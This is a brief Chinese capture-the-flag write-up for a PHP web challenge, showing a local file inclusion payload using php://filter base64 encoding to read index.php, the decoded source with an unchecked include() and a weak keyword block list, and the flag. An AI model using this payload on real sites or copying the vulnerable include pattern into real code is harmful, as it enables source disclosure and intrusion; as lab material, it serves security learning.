http://4.chinalover.sinaapp.com/web7/index.php
题解:
文件包含漏洞的格式网址,通过php://filter读取index源码-->php://filter/read=convert.base64-encode/resource=index.php
参考文章:https://www.2cto.com/article/201311/258420.html
base64解码:
<html>
<title>asdf</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:nctf{edulcni_elif_lacol_si_siht}
?>
</html>